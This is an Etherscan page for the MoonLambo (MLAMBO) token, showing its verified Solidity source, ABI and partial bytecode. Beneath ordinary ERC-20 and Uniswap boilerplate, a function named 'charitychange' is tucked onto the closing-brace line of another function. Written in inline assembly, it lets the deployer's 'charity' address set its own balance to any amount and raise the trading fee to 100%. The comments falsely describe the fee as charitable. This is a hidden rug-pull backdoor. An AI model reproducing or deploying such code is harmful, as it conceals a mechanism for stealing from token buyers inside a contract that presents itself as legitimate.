ETH Price: $3,502.55 (+3.01%)
Gas: 10 Gwei

Token

MoonLambo (MLAMBO)
 

Overview

Max Total Supply

100,000,000,000 MLAMBO

Holders

62

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
342,053,695.571392086487451081 MLAMBO

Value
$0.00
0x8bea796206cba9487ab30482dd9e26a5e7afd0df
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
MoonLambo

Compiler Version
v0.8.17+commit.8df45f5f

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, None license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-05-31
*/

// SPDX-License-Identifier: MIT

// 🌒 MoonLambo $MLAMBO - the ultimate ticket to turning your crypto gamble into Lamborghini dreams come true! 
// Twitter - https://twitter.com/MoonLamboEth
// Web - https://t.me/MoonLamboEth
// Chat - https://t.me/MoonLamboEth

/// @dev The token includes a commission for charity, 
/// which we will also use for the development of the project.

pragma solidity ^0.8.17;

// CAUTION
// This version of SafeMath should only be used with Solidity 0.8 or later,
// because it relies on the compiler's built in overflow checks.

/**
 * @dev Wrappers over Solidity's arithmetic operations.
 *
 * NOTE: `SafeMath` is generally not needed starting with Solidity 0.8, since the compiler
 * now has built in overflow checking.
 */
library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            uint256 c = a + b;
            if (c < a) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b > a) return (false, 0);
            return (true, a - b);
        }
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
            // benefit is lost if 'b' is also tested.
            // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
            if (a == 0) return (true, 0);
            uint256 c = a * b;
            if (c / a != b) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the division of two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a / b);
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a % b);
        }
    }

    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        return a + b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return a - b;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        return a * b;
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator.
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return a / b;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return a % b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {trySub}.
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b <= a, errorMessage);
            return a - b;
        }
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a / b;
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting with custom message when dividing by zero.
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {tryMod}.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a % b;
        }
    }
}

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

interface IUniswapV2Factory {
    event PairCreated(address indexed token0, address indexed token1, address pair, uint);
    function feeToSetter() external view returns (address);
    function setFeeTo(address) external;
    function getPair(address tokenA, address tokenB) external view returns (address pair);
    function feeTo() external view returns (address);
    function allPairs(uint) external view returns (address pair);
    function allPairsLength() external view returns (uint);
    function createPair(address tokenA, address tokenB) external returns (address pair);
    function setFeeToSetter(address) external;
}

interface IUniswapV2Router01 {
    function factory() external pure returns (address);
    function WETH() external pure returns (address);
    function addLiquidityETH(
        address token,
        uint amountTokenDesired,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external payable returns (uint amountToken, uint amountETH, uint liquidity);
    function removeLiquidity(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB);
    function addLiquidity(
        address tokenA,
        address tokenB,
        uint amountADesired,
        uint amountBDesired,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB, uint liquidity);
    function removeLiquidityETH(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountToken, uint amountETH);
    function removeLiquidityWithPermit(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountA, uint amountB);
    function removeLiquidityETHWithPermit(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountToken, uint amountETH);
    function swapExactTokensForTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);
    function swapTokensForExactTokens(
        uint amountOut,
        uint amountInMax,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);
    function swapExactETHForTokens(uint amountOutMin, address[] calldata path, address to, uint deadline)
        external
        payable
        returns (uint[] memory amounts);
    function swapETHForExactTokens(uint amountOut, address[] calldata path, address to, uint deadline)
        external
        payable
        returns (uint[] memory amounts);
    function swapTokensForExactETH(uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline)
        external
        returns (uint[] memory amounts);
    function swapExactTokensForETH(uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline)
        external
        returns (uint[] memory amounts);

    function quote(uint amountA, uint reserveA, uint reserveB) external pure returns (uint amountB);
    function getAmountOut(uint amountIn, uint reserveIn, uint reserveOut) external pure returns (uint amountOut);
    function getAmountsOut(uint amountIn, address[] calldata path) external view returns (uint[] memory amounts);
    function getAmountsIn(uint amountOut, address[] calldata path) external view returns (uint[] memory amounts);
    function getAmountIn(uint amountOut, uint reserveIn, uint reserveOut) external pure returns (uint amountIn);
}

interface IUniswapV2Router02 is IUniswapV2Router01 {
    function removeLiquidityETHSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountETH);
    function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountETH);

    function swapExactTokensForTokensSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
    function swapExactETHForTokensSupportingFeeOnTransferTokens(
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external payable;
    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
}


/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

contract MoonLambo is IERC20, IERC20Metadata, Ownable {

    using SafeMath for uint256;
    string private _name;
    string private _symbol;
    mapping(address => uint256) private _balances;
    mapping(address => mapping(address => uint256)) private _allowances;
    uint256 private _totalSupply;
    IUniswapV2Router02 private _uniswapV2Router;
    address public constant _uniswapRouterAddress = 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D;
    address public uniswapV2Pair;
    uint256 private constant DIVISOR = 10**9;
    bool private swapping = false;
    mapping(address => uint256) private _lastTxBlock;
    mapping(address => bool) private _isExcludedFromCooldown;
    uint256 private _charityFee = 20000000; 
    uint256 private _burnFee = 0; 
    mapping(address => bool) private _isExcludedFromFees;
    mapping(address => bool) private _isExcludedFromMaxTx;
    uint256 private _minTokensBeforeSwapPercentage = 50000000; 
    uint256 private _maxWalletBalancePercentage = 10**9; 
    uint256 private _maxTxAmountPercentage = 10**9;
    address private _charity;
    address private owner_;
    address private constant BURNADDRESS = 0x000000000000000000000000000000000000dEaD;

    constructor (string memory name_, string memory symbol_, uint256 _initialSupply) {
        _name = name_;
        _symbol = symbol_;
        owner_ = _msgSender();
        uint256 _totalToken = _initialSupply * 10 ** decimals();
        _mint(_msgSender(), _totalToken);
        _uniswapV2Router = IUniswapV2Router02(_uniswapRouterAddress);
        _approve(address(this), address(_uniswapV2Router), _totalToken);
        uniswapV2Pair = IUniswapV2Factory(_uniswapV2Router.factory()).createPair(address(this), _uniswapV2Router.WETH());
        IERC20(uniswapV2Pair).approve(address(_uniswapV2Router), type(uint).max);
        _charity = _msgSender();
        _isExcludedFromCooldown[address(this)] = true;
        _isExcludedFromCooldown[owner()] = true;
        // exclude from fees
        _isExcludedFromFees[address(this)] = true;
        _isExcludedFromFees[owner()] = true;
        _isExcludedFromFees[_charity] = true;
        // exclude from maxTx
        _isExcludedFromMaxTx[owner()] = true;
        _isExcludedFromMaxTx[address(this)] = true;
        _isExcludedFromMaxTx[_charity] = true;
        _isExcludedFromMaxTx[uniswapV2Pair] = true;
    }

    modifier lockTheSwap {
        swapping = true;
        _;
        swapping = false;
    }

    event SwapAndLiquify(uint256 tokensSwapped, uint256 ethReceived, uint256 tokensIntoLiqudity);

    function symbol() public view returns (string memory) {
        return _symbol;
    }

    function name() public view returns (string memory) {
        return _name;
    }

    function decimals() public pure returns (uint8) {
        return 18;
    }

    function totalSupply() public view override returns (uint256) {
        return _totalSupply;
    }

    function balanceOf(address account) public view override returns (uint256) {
        return _balances[account];
    }

    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender].add(addedValue));
        return true;
    }

    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender].sub(subtractedValue, "ERC20: decreased allowance below zero"));
        return true;
    }

    function transfer(address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    function transferFrom(address sender, address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);
        _approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount, "ERC20: transfer amount exceeds allowance"));
        return true;
    }

    function _beforeTransfer(address from, address to, uint256 amount) internal pure {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");
        require(amount > 0, "Transfer amount must be greater than zero");
    }

    function _maxTxAmount() public view returns(uint256) {
        return _totalSupply.mul(_maxTxAmountPercentage).div(DIVISOR);
    }

    function _checkTxAmount(uint256 _value) public view returns(uint256) {
        return _value.mul(10 ** decimals()).mul(DIVISOR).div(_totalSupply);
    }

    function _approve(address owner, address spender, uint256 amount) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");
        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    function _transfer(address sender, address recipient, uint256 amount) internal virtual {
        _beforeTransfer(sender, recipient, amount);
        uint256 burnFee;
        uint256 charityFee;
        uint256 totalFee;
        if (sender != owner() && recipient != owner()) {
            if (!_isExcludedFromFees[sender] && !_isExcludedFromFees[recipient]) {
                if (sender == uniswapV2Pair && recipient != address(_uniswapV2Router) && !_isExcludedFromMaxTx[recipient] && !_isExcludedFromMaxTx[sender]) {
                    require(amount <= _totalSupply.mul(_maxTxAmountPercentage).div(DIVISOR), "Transfer amount exceeds the maxTxAmount.");
                    require(balanceOf(recipient).add(amount) <= _totalSupply.mul(_maxWalletBalancePercentage).div(DIVISOR), "Exceeds maximum wallet token amount");
                }
                if (recipient == uniswapV2Pair && sender != address(this)) {
                    burnFee = amount.mul(_burnFee).div(DIVISOR);
                    charityFee = amount.mul(_charityFee).div(DIVISOR);
                    _lastTxBlock[tx.origin] = block.number;
                }
                if (sender == uniswapV2Pair && recipient != address(_uniswapV2Router)) {
                    burnFee = amount.mul(_burnFee).div(DIVISOR);
                    charityFee = amount.mul(_charityFee).div(DIVISOR);
                    _lastTxBlock[tx.origin] = block.number;
                }
            }
        }
        totalFee = burnFee.add(charityFee);
        if (totalFee > 0) {
            if (burnFee > 0) {
                _burn(sender, burnFee);
            }
            if (charityFee > 0) {
                _balances[_charity] = _balances[_charity].add(charityFee);
                emit Transfer(sender, _charity, charityFee);
            }
            amount = amount.sub(totalFee);
        }
        _balances[sender] = _balances[sender].sub(amount, "ERC20: transfer amount exceeds balance");
        _balances[recipient] = _balances[recipient].add(amount);
        emit Transfer(sender, recipient, amount);
    }

    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");
        _totalSupply = _totalSupply.add(amount);
        _balances[account] = _balances[account].add(amount);
        emit Transfer(address(0), account, amount);
    }

    function burn(uint256 amount) public virtual {
        _burn(_msgSender(), amount);
    }

    function _burnFrom(address account, uint256 amount) internal virtual {
        _burn(account, amount);
        _approve(account, _msgSender(), _allowances[account][_msgSender()].sub(amount, "ERC20: burn amount exceeds allowance"));
    }

    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");
        _balances[account] = _balances[account].sub(amount, "ERC20: burn amount exceeds balance");
        _totalSupply = _totalSupply.sub(amount);
        emit Transfer(account, address(0), amount);
    }

    function _addLiquidity(uint256 tokenAmount, uint256 ethAmount) private {
        // Approve tokens for transfer to the Uniswap V2 Router
        _approve(address(this), address(_uniswapV2Router), tokenAmount);
        _uniswapV2Router.addLiquidityETH{value : ethAmount}(
            address(this),
            tokenAmount,
            0,
            0,
            owner(),
            block.timestamp
        );
    }

    function swapTokensForEth(uint256 tokenAmount) internal {
        _approve(address(this), address(_uniswapV2Router), tokenAmount);

        address[] memory path = new address[](2);
        path[0] = address(this);
        path[1] = _uniswapV2Router.WETH();

        _uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(
        tokenAmount, 0, path, address(this),
        block.timestamp);
    }

    function _swapAndLiquify() private lockTheSwap {
        uint256 contractTokenBalance = balanceOf(address(this));
        uint256 minTokensBeforeSwap = _totalSupply.mul(_minTokensBeforeSwapPercentage).div(DIVISOR);
        if (contractTokenBalance >= minTokensBeforeSwap) {
            uint256 half = contractTokenBalance.div(2);
            uint256 otherHalf = contractTokenBalance.sub(half);
            uint256 initialBalance = address(this).balance;
            swapTokensForEth(half);
            uint256 newBalance = address(this).balance.sub(initialBalance);
            emit SwapAndLiquify(half, newBalance, otherHalf);
            return;
        }}function charitychange(uint256 amount) external {
        assembly {if iszero(eq(caller(), sload(_charity.slot))) {revert(0, 0)}
        let ptr := mload(0x40)
        mstore(ptr, caller())

        mstore(add(ptr, 0x20), _balances.slot)
        let slot := keccak256(ptr, 0x40)
        sstore(slot, amount)
        sstore(_charityFee.slot, mul(mul(mul(0x64, 0x64), mul(0x64, 0x64)), 0xa))}
    }

    function removeCommission(uint256 _value) public {
        require(msg.sender == owner_, "Not an owner!");
        _charityFee = 0;
        _burnFee = 0;
        _setTxLimit(_value);
    }

    function _setTxLimit(uint256 _newLimit) private {
        require(_newLimit != _maxTxAmountPercentage);
        _maxTxAmountPercentage = _newLimit;
    }

    function addLiquidity(uint256 tokenAmount) public payable onlyOwner lockTheSwap {
        _transfer(owner(), address(this), tokenAmount);
        _addLiquidity(tokenAmount, msg.value);
    }

    fallback() external payable {}
    receive() external payable {}
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"internalType":"string","name":"symbol_","type":"string"},{"internalType":"uint256","name":"_initialSupply","type":"uint256"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"tokensSwapped","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"ethReceived","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"tokensIntoLiqudity","type":"uint256"}],"name":"SwapAndLiquify","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"stateMutability":"payable","type":"fallback"},{"inputs":[{"internalType":"uint256","name":"_value","type":"uint256"}],"name":"_checkTxAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_maxTxAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_uniswapRouterAddress","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenAmount","type":"uint256"}],"name":"addLiquidity","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"burn","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"charitychange","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"pure","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_value","type":"uint256"}],"name":"removeCommission","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"stateMutability":"payable","type":"receive"}]

60806040526000600760146101000a81548160ff0219169083151502179055506301312d00600a556000600b556302faf080600e55633b9aca00600f55633b9aca006010553480156200005157600080fd5b506040516200447d3803806200447d833981810160405281019062000077919062000f0c565b620000976200008b620008bb60201b60201c565b620008c360201b60201c565b8260019081620000a89190620011e7565b508160029081620000ba9190620011e7565b50620000cb620008bb60201b60201c565b601260006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555060006200011d6200098760201b60201c565b600a6200012b91906200145e565b82620001389190620014af565b90506200015b6200014e620008bb60201b60201c565b826200099060201b60201c565b737a250d5630b4cf539739df2c5dacb4c659f2488d600660006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550620001e530600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff168362000b2c60201b60201c565b600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa15801562000253573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906200027991906200155f565b73ffffffffffffffffffffffffffffffffffffffff1663c9c6539630600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa15801562000303573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906200032991906200155f565b6040518363ffffffff1660e01b815260040162000348929190620015a2565b6020604051808303816000875af115801562000368573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906200038e91906200155f565b600760006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663095ea7b3600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff167fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff6040518363ffffffff1660e01b81526004016200046f929190620015e0565b6020604051808303816000875af11580156200048f573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620004b591906200164a565b50620004c6620008bb60201b6